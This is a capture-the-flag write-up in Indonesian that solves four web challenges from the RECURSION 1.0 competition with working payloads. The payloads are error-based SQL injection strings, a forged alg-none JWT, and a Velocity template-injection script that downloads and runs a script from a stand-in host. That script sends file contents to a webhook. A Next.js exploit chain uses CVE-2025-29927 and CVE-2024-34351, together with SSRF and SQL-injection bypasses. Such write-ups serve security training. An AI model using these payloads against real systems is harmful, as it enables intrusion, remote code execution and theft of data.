RECURSION 1.0

Last updated 27 days ago

RECURSION 1.0

Participated with team DAFTAR H - 3 MENIT

Name

Pablu inGjection

TL;DR

Error based SQL Injection pada PostgreSQL

Solution

Terdapat halaman login ketika pertama kali mengakses websitenya

Karena disini tidak diberikan source code maka langsung berasumsi untuk melakukan sql injection dan ternyata bisa, lalu mencoba untuk melakukan trigger error jika memang error tersebut reflected, dengan input sederhana seperti dibawah ke username untuk mengkonfirmasi error

'"

Oke, karena berhasil maka bisa dimanfaatkan untuk Error Based SQL Injection, jika dilihat dari error message nya database yang digunakan adalah PostgreSQL, maka langsung saja untuk melakukan enumerasi database dan mendapatkan flagnya

Enumerasi tabel

' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 1) as int) --

Enumerasi column

' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='pabluflags' LIMIT 1 OFFSET 1) as int) --

Read flag

' and 1=cast((SELECT pgflag FROM pabluflags) as int) and '1'='1

Flag

RECURSION{rrrRRAAAHHHH_selamat_bang!!Maaf_yak_soalnya_kyk_gini_doang_soalnya_baru_pertama_kali_jadi_probset}

Warung

TL;DR

Hidden page via robots.txt and JWT None algorithm

Solution

Tampilan awal website ini hanya halaman seperti static site dan disini tidak ada info apapun dan blackbox

Karena tidak ada info lagi disini mencoba classic approach yaitu melakukan cek robots.txt

Ternyata benar terdapat hidden page disini yaitu secret-portal.html

Hidden page yang menampilkan halaman login, dan coba untuk menginputkan karakter sembarang

Hmm berhasil, asumsi disini bahwa tidak ada pengecekan apapun, namun disitu terdapat alerting yaitu Only agent Pablu karena itu coba lagi login menggunakan username Pablu

Ternyata bisa, namun lagi lagi terdapat alerting message bahwa disini harus diakses oleh admin, namun kembali lagi ke asumsi sebelumnya bahwa tidak ada pengecekan authorization apapun disini, oleh karena itu coba melakukan cek ke cookie? mungkin saja terdapat sesuatu disana

Benar ternyata terdapat setter cookie dan ketika dicek auth token tersebut memiliki alg none sehingga bisa langsung saja melakukan patching role menjadi admin tanpa harus memiliki secret key

Oke setelah itu langsung patch dan ganti ke auth token yang telah memiliki role admin dan akses kembali halamannya

Flag

RECURSION{miss1on_succ3ss_agent_pablu_09}

Sindrom Velocity

TL;DR

SSTI via Java Velocity template engine dengan melakukan bypass beberapa hal

Solution

Attachment yang diberikan adalah Java dimana akan melakukan proses mengenai login namun terdapat processing template engine menggunakan Velocity, kurang lebih berikut adalah source code hasil decompile nya

package recursion.ctf.velocity;

import java.io.InputStream;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Scanner;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.velocity.Template;
import org.apache.velocity.context.Context;
import org.apache.velocity.runtime.RuntimeServices;
import org.apache.velocity.runtime.RuntimeSingleton;
import org.apache.velocity.runtime.parser.node.SimpleNode;
import org.apache.velocity.tools.view.VelocityViewServlet;

public class LoginServlet extends VelocityViewServlet {
   private static final String USERNAME = "admin";
   private static final String PASSWORD = "REDACTED";
   private String templateString;

   public void init(ServletConfig config) throws ServletException {
      super.init(config);
      InputStream stream = this.getServletContext().getResourceAsStream("templates/login.vm");
      Scanner scanner = (new Scanner(stream)).useDelimiter("\\A");

      try {
         this.templateString = scanner.hasNext() ? scanner.next() : "";
      } catch (Throwable var7) {
         if (scanner != null) {
            try {
               scanner.close();
            } catch (Throwable var6) {
               var7.addSuppressed(var6);
            }
         }

         throw var7;
      }

      if (scanner != null) {
         scanner.close();
      }

   }

   protected Template handleRequest(HttpServletRequest request, HttpServletResponse response, Context ctx) {
      Template tt = null;
      String al = "Please login";
      String st = "danger";
      String ic = "bi bi-exclamation-triangle-fill";
      String uu;
      String pp;
      if ("POST".equals(request.getMethod())) {
         uu = request.getParameter("username");
         pp = request.getParameter("password");
         if (uu != null && uu.equals("admin")) {
            if (pp != null && pp.equals("REDACTED")) {
               al = "Login successful :)";
               st = "success";
               ic = "bi bi-check-circle-fill";
            } else {
               al = "Invalid password";
            }
         } else {
            al = "Username '" + uu.split(" ")[0] + "' not found";
         }
      }

      try {
         uu = URLDecoder.decode(al, StandardCharsets.UTF_8.toString()).replaceAll("\\$\\w+", "").replaceAll("\\#\\w+", "").replaceAll("!", "").replaceAll("\"", "&quot;");
         pp = this.templateString.replace("[ERROR]", "#[[" + uu + "]]#").replace("[STATUS]", "#[[" + st + "]]#").replace("[ICON]", "#[[" + ic + "]]#");
         RuntimeServices rs = RuntimeSingleton.getRuntimeServices();
         SimpleNode sn = rs.parse(pp, "login");
         tt = new Template();
         tt.setRuntimeServices(rs);
         tt.setData(sn);
         tt.initDocument();
      } catch (Exception var12) {
      }

      return tt;
   }
}

Bisa dilihat bahwa terdapat "manual" handling template dan melakukan replacement dibagian serverside dan kemudian melakukan eksekusi, namun terdapat regex replacement disana yang memberikan restriksi sekaligus bantuan untuk melakukan bypass restriksi itu sendiri

Yang terpenting dalam melakukan eksploitasi disini adalah melakukan bypass regex replacement pada bagian $ dan # dimana jika kedua karakter tersebut diikuti oleh karakter alphanumeric maka akan dihapus, hal tersebut dapat dibypass menggunakan karakter ! didedapannya karena pada akhirnya tanda ! akan dihilangkan, jadi kurang lebih akan menjadi seperti ini

#set => $!set
$name => $!name

example:

#set($name='rootkids') => #!set($!name='rootkids')

Lalu kemudian untuk melakukan bypass space bisa menggunakan teknik concatenation saja.

Dan berikut adalah automate solve script yang digunakan

solver.py

import httpx
import argparse


class ArgsType:
    target: str


class CredentialType:
    username: any
    password: any


class Exploiter:
    def __init__(self, target: str, creds: CredentialType = None):
        self.client = httpx.Client(base_url=target)
        self.creds = creds

    def login(self):
        return self.client.post("/login", data=self.creds.__dict__)

    def exploit(self):
        res = self.login()
        if res.status_code != 500:
            print("[+] EXPLOIT SUCCESSFULL")

    @staticmethod
    def parse_args() -> ArgsType:
        parser = argparse.ArgumentParser(description="Exploit a target")
        parser.add_argument("-t", "--target", required=True, help="Target URL")
        return parser.parse_args()


if __name__ == "__main__":
    creds = CredentialType()
    args = Exploiter.parse_args()

    EVIL_URL = "https://example.com/evil.sh"

    # STAGE 1: Download evil script
    creds.username, creds.password = (
        f"hello]]#\n#!set($!str=$!class.inspect('java.lang.String').type)\n#!set($!chr=$!class.inspect('java.lang.Character').type)\n#!set($!space=$!str.valueOf($!chr.toChars(32)))\n#!set($!cmd=$!str.valueOf('curl').concat($!space).concat('{EVIL_URL}').concat($!space).concat('-o').concat($!space).concat('/tmp/evil.sh'))\n#!set($!ex=$!class.inspect('java.lang.Runtime').type.getRuntime().exec($!cmd))\n$!ex.waitFor()\n#[[world",
        "12321",
    )
    exploiter = Exploiter(args.target, creds)
    exploiter.exploit()

    # STAGE 2: Make the script executable
    creds.username = "hello]]#\n#!set($!str=$!class.inspect('java.lang.String').type)\n#!set($!chr=$!class.inspect('java.lang.Character').type)\n#!set($!space=$!str.valueOf($!chr.toChars(32)))\n#!set($!cmd=$!str.valueOf('chmod').concat($!space).concat('%2bx').concat($!space).concat('/tmp/evil.sh'))\n#!set($!ex=$!class.inspect('java.lang.Runtime').type.getRuntime().exec($!cmd))\n$!ex.waitFor()\n#[[world"
    exploiter = Exploiter(args.target, creds)
    exploiter.exploit()

    # STAGE 3: Execute the script
    creds.username = "hello]]#\n#!set($!str=$!class.inspect('java.lang.String').type)\n#!set($!chr=$!class.inspect('java.lang.Character').type)\n#!set($!space=$!str.valueOf($!chr.toChars(32)))\n#!set($!cmd=$!str.valueOf('/tmp/evil.sh'))\n#!set($!ex=$!class.inspect('java.lang.Runtime').type.getRuntime().exec($!cmd))\n$!ex.waitFor()\n#[[world"
    exploiter = Exploiter(args.target, creds)
    exploiter.exploit()

Terdapat 3 stage disini, yaitu melakukan download bash script dari external service kemudian memberikan executable akses, dan terakhir melakukan eksekusi script tersebut.

Dan untuk konten bash script tersebut bisa apa aja, namun dalam kasus ini akan melakukan callback output dari read flagnya, kurang lebih seperti ini

#!/bin/sh

curl https://webhook.example.com?c=`cat /f*`

Kemudian jalankan solver script tersebut

Karena ada replacement karakter { dan } maka tinggal gabungkan saja nanti sesuai format flag

Flag

RECURSION{Dung_DungTak_DungDungTak_DungTak_0dd00e33b6fc67b811ebe3177217d6c0}

Palabutung

TL;DR

Memanfaatkan 2 CVE pada Nextjs CVE-2025-29927 dan CVE-2024-34351, lalu melakukan bypass SSRF localhost dan leak comment melalui SQL Injection

Solution

Web ini memiliki 2 service dimana menggunakan Nextjs dan juga Flask App.

Observe Nextjs Service

Pertama observe terlebih dahulu pada service Nextjs, dapat dilihat pada package.json yang digunakan adalah versi 14.0.4

Dimana dalam versi ini terdapat 2 proof CVE yang ada, yaitu mengenai vulnerability SSRF (CVE-2024-34351) dan melakukan Bypass Middleware (CVE-2025-29927).

Dari kedua resource CVE diatas dan dari penarapan service Nextjs nya memang memiliki celah dari kedua CVE tersebut.

Pertama adalah proof dari CVE-2024-34351, dimana penggunaan server-action diikuti redirection.

next-app/app/admin/action.ts

"use server";

import { redirect } from "next/navigation";
import { NextResponse } from "next/server";

export async function logInternalServer(formData: FormData) {
  "use server";
  const message = formData.get("message");
  const secretKey = formData.get("secret-key");

  if (secretKey !== process.env.SECRET_KEY) {
    return NextResponse.json({ error: "Invalid secret key" }, { status: 403 });
  }

  await fetch("http://flaskapp:5000/log", {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
    body: JSON.stringify({
      message: message,
    }),
  });

  
}

Koda diatas menunjukan bahwa terdapat penggunaan server action, dimana fungsinya adalah melakukan fetching ke internal service lain, yaitu service flask app yang kemudian melakukan redirect, dimana ini adalah titik celah keamanannya.

Yang kedua adalah melakukan bypass middleware jika menggunakan autentikasi via middleware.

next-app/middleware.ts

import { NextResponse, type NextRequest } from "next/server";
import { verifyJwtToken } from "@/_libs/auth";

export async function middleware(request: NextRequest) {
  const token = request.cookies.get("jwt")?.value;
  const user =
    token &&
    (await verifyJwtToken(token).catch((err) => {
      console.log(err);
    }));

  if (request.nextUrl.pathname.startsWith("/login")) {
    if (user) {
      return NextResponse.redirect(new URL("/", request.url));
    }
  }

  if (request.nextUrl.pathname.startsWith("/admin")) {
    if (!user) {
      return NextResponse.redirect(new URL("/login", request.url));
    }

    if (user.role !== "admin") {
      return NextResponse.redirect(new URL("/login", request.url));
    }
  }

  return NextResponse.next();
}

Terlihat bahwa akses ke path /admin dibatasi menggunakan middleware dan ini dapat kita bypass menggunakan PoC dari CVE-2025-29927.

Observe Flask Service

Flask app nya ini sebenarnya sangat simple dan to the point, dimana untuk mendapatkan flagnya ada dibagian route berikut

@app.route("/flag", methods=["GET"])
def get_flag():
    global flag
    if get_client_ip() != "127.0.0.1":
        return "Forbidden", 403
    app.logger.info(f"Encrypting flag: {flag}")
    encrypted_flag = AESGCM(key).encrypt(nonce, flag.encode(), associated_data=None)
    return encrypted_flag.hex(), 200

Bisa dilihat bahwa untuk mengakses route ini ip nya harus berasal dari localhost atau 127.0.0.1 dan kemudian flag tersebut akan diencrypt menggunakan AESGCM dan terdapat key dan nonce yang harus diketahui.

Untuk key dan nonce ini dileak melalui salah satu endpoint, dimana vulnerable terhadap sql injection

@app.route("/users", methods=["GET"])
def get_users():
    username = request.args.get("username")

    if not username:
        return "Missing username", 400

    query = f"""SELECT username, /*{key.hex()}*/ /*{nonce.hex()}*/ role from User where username like '%{username}%' order by 1 limit 1"""
    app.logger.info(
        f"{get_client_ip()} is executing query: {query}"
    )  # hayoloh jangan ngetroll

    try:
        cur = mysql.connection.cursor()
        cur.execute(query)
        records = cur.fetchall()
        column_names = [desc[0] for desc in cur.description]
        cur.close()
    except Exception as e:
        return str(e), 400

    result = [dict(zip(column_names, row)) for row in records]
    return jsonify(result)

Jika dilihat bahwa key dan nonce tersebut diembed dalam query sql, namun diembed didalam comment, sehingga tidak dieksekusi. Ada salah satu cara untuk melakukan leak hal tersebut yaitu dengan mendapatkan current query ketika dieksekusi, dimana hal tersebut bisa didapatkan dengan query berikut

SELECT info FROM INFORMATION_SCHEMA.PROCESSLIST

Dan karena endpoint itu vulnerable terhadap sql, maka dapat kita inject dengan menginputkan parameter username seperti berikut

' UNION SELECT 1, info FROM INFORMATION_SCHEMA.PROCESSLIST --

Nice.

Selanjutnya karena endpoint flag harus diakses melalui localhost maka perlu SSRF dari internal flaskapp service tersebut, dan good news nya adalah terdapat endpoint berikut

@app.route("/debug", methods=["GET"])
def debug():
    url = request.args.get("url")

    trusted = True
    if urlparse(url).hostname in ["localhost", "127.0.0.1", "::1", "0.0.0.0"]:
        app.logger.info(
            f"Not trusted debug from {url}, hostname is {urlparse(url).hostname}"
        )
        trusted = False

    if url.endswith("/flag"):
        app.logger.info(f"Not trusted debug from {url}")
        trusted = False

    if trusted:
        app.logger.info(f"Trusted debug from {url}")

        try:
            res = requests.get(url)
        except Exception as e:
            return str(e), 400

        return f"Thanks for debugging with us, here's your response: {res.text}", 200

    return "Ok but we don't trust you yet", 200

Endpoint tersebut akan melakukan fetching ke url, namun ada restriksi hostname yang didisallow dan tidak boleh berakhiran dengan /flag, dapat dibypass dengan input sebagai berikut

http://[0:0:0:0:0:ffff:127.0.0.1]:5000/flag?hacked

Menggunakan IPv6 untuk membypass hostname dan menambahkan appended query ?hacked untuk membypass check endswith functionnya.

Dan karena flaskapp ini adalah internal service dan tidak diekspose maka kita perlu SSRF dari network yang sama. Yes! kita bisa exploit via Nextjs service tadi!.

Exploit

Karena kita sudah tahu semua vulnerable dan objective yang dapat digunakan maka kita bisa susun workflow exploitnya seperti berikut

Nextjs admin access bypass middleware via CVE-2025-29927
SSRF into Flask App via CVE-2024-34351
Leak key and nonce
Leak encrypted flag via /debug endpoint -> ssrf into /flag

Dan berikut adalah automation script solver yang digunakan

solver.py

import httpx
import argparse


class ArgsType:
    target: str
    host: str


class Exploiter:
    def __init__(self, target: str, evil_host: str = "example.com"):
        self.client = httpx.Client(base_url=target)
        self.evil_host = evil_host

    def log(self):

        return self.client.post(
            "/admin",
            headers={
                "Host": self.evil_host,
                "x-middleware-subrequest": "middleware",
                "Next-Action": "431c0efc61a99f919333fe092af2035bca58d99e",
            },
            data={
                "1_$ACTION_ID_431c0efc61a99f919333fe092af2035bca58d99e": "",
                "1_message": "rootkids",
                "1_secret-key": "iniadalahsecretkeynyakamujangankasihtahusiapasiapaya",
                "0": '["$K1"]',
            },
            follow_redirects=True,
        )

    def exploit(self):
        res = self.log()
        print(res.status_code)
        print(res.text)

    @staticmethod
    def parse_args() -> ArgsType:
        parser = argparse.ArgumentParser(description="Exploit a target")
        parser.add_argument("-t", "--target", required=True, help="Target URL")
        parser.add_argument("-H", "--host", default="example.com", help="Evil host header value")
        return parser.parse_args()


if __name__ == "__main__":
    args = Exploiter.parse_args()

    exploiter = Exploiter(args.target, args.host)
    exploiter.exploit()

Untuk header requests disana didapatkan dari melakukan interception request dari service nextjs nya.

Dan untuk argument host ini adalah webserver dari attacker yang dijadikan sebagai middle-attack dari proof Nextjs SSRF CVE tadi. Dan berikut adalah source app webserver nya

from flask import Flask, Response, request, redirect
from urllib.parse import quote_plus

app = Flask(__name__)


@app.route("/log")
def catchlog():
    if request.method == "HEAD":
        resp = Response("")
        resp.headers["Content-Type"] = "text/x-component"
        return resp
    
    # => LEAK KEY and NONCE
    return redirect(f"http://flaskapp:5000/users?username={quote_plus("' UNION SELECT 1, info FROM INFORMATION_SCHEMA.PROCESSLIST -- ")}")
    
    # => LEAK ENCRYPTED FLAG
    return redirect(f"http://flaskapp:5000/debug?url={quote_plus("http://[0:0:0:0:0:ffff:127.0.0.1]:5000/flag?hacked")}")


if __name__ == "__main__":
    app.run(port=5000, debug=True)

Untuk redirect nya gunakan sesuai dengan kebutuhan *comment salah satu

Selanjutnya let's do the exploit!

Jalankan middle-attack server

Leak key dan nonce

Oke kita dapat key dan nonce, dalam session ini key nya adalah 31dfe3e212e40cb54e9716ea1806b6e9c114306bfa9c31826630885856c5f159

dan nonce nya adalah

3987967401ff86aed13d43cc

Selanjutnya leak encrypted flagnya

Nice, kita dapat encrypted flagnya, selanjutnya langsung decrypt saja

from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from Crypto.Util.number import long_to_bytes

key = long_to_bytes(0x31DFE3E212E40CB54E9716EA1806B6E9C114306BFA9C31826630885856C5F159)
nonce = long_to_bytes(0x3987967401FF86AED13D43CC)
ciphertext = long_to_bytes(
    0xB03107A5C1E3BCD0253CCB2FD5A7522BC73CBFFED5DB91AE7BB9AA0B54415B255BE7494A67CB53B4D01EADEC15E9606909E8E74B83D6EAF224C5C193A4C92D288C7723F2AAAA9803B56E1C458D11
)

aesgcm = AESGCM(key)
decrypted_flag = aesgcm.decrypt(nonce, ciphertext, associated_data=None)

print(decrypted_flag.decode())

Flag

RECURSION{banyak_pemanisnya_kayak_palubutung_tapi_gampang_kan}

Last updated 27 days ago